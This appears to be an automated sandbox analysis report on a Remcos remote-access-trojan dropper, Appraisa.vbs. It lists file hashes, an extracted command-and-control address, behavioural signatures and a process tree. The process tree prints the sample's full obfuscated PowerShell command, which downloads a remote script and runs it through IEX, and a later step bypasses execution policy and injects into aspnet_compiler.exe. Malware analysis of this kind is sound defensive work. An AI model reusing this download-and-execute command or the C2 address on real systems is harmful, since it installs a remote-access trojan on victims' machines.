Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-04-2021 14:40
Static task
static1
Behavioral task
behavioral1
Sample
Appraisa.vbs
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Appraisa.vbs
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Property.hta
Resource
win7v20210410
General
-
Target
Appraisa.vbs
-
Size
662B
-
MD5
2e95d045ff86903502b52f5fd0976aad
-
SHA1
c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
-
SHA256
dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
-
SHA512
0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 8 632 powershell.exe 18 632 powershell.exe 20 632 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1864 set thread context of 2904 1864 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 632 powershell.exe 632 powershell.exe 632 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 2904 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 3968 wrote to memory of 632 3968 WScript.exe powershell.exe PID 3968 wrote to memory of 632 3968 WScript.exe powershell.exe PID 632 wrote to memory of 1864 632 powershell.exe powershell.exe PID 632 wrote to memory of 1864 632 powershell.exe powershell.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe PID 1864 wrote to memory of 2904 1864 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ Microsoft.ps1MD5
eda0264cc0baa7804ce2a32a99aa9b98
SHA1274b4d04e802370cac624649ea30149dded4e053
SHA256950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f
SHA51243f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74
-
memory/632-114-0x0000000000000000-mapping.dmp
-
memory/632-120-0x0000020C6EED0000-0x0000020C6EED1000-memory.dmpFilesize
4KB
-
memory/632-123-0x0000020C6FA30000-0x0000020C6FA31000-memory.dmpFilesize
4KB
-
memory/632-124-0x0000020C6EF90000-0x0000020C6EF92000-memory.dmpFilesize
8KB
-
memory/632-125-0x0000020C6EF93000-0x0000020C6EF95000-memory.dmpFilesize
8KB
-
memory/632-130-0x0000020C6EF96000-0x0000020C6EF98000-memory.dmpFilesize
8KB
-
memory/1864-145-0x000002099A983000-0x000002099A985000-memory.dmpFilesize
8KB
-
memory/1864-144-0x000002099A980000-0x000002099A982000-memory.dmpFilesize
8KB
-
memory/1864-160-0x000002099B500000-0x000002099B501000-memory.dmpFilesize
4KB
-
memory/1864-135-0x0000000000000000-mapping.dmp
-
memory/1864-177-0x000002099B4B0000-0x000002099B4C8000-memory.dmpFilesize
96KB
-
memory/1864-184-0x000002099A986000-0x000002099A988000-memory.dmpFilesize
8KB
-
memory/2904-182-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/2904-183-0x000000000042EEEF-mapping.dmp
-
memory/2904-188-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB